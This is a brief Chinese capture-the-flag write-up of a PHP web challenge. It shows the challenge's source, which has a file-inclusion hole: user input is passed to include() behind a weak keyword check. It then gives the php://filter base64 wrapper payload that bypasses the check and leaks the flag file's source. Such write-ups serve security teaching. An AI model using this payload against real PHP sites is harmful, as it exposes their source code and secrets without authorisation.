题目比较简单直接解题吧。
从报错信息可以看出,里面有include函数。并且发现他拼接了一个.php后缀
解码:
<?php
$file = $_GET['category'];
if(isset($file))
{
if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){
include ($file . '.php');
}
else{
echo "Sorry, we currently only support woofers and meowers.";
}
}
?>
发现只要包含三个字符串中的一个就能正常执行。利用PHP伪协议的嵌套。
php://filter/read=convert.base64-encode/index/resource=flag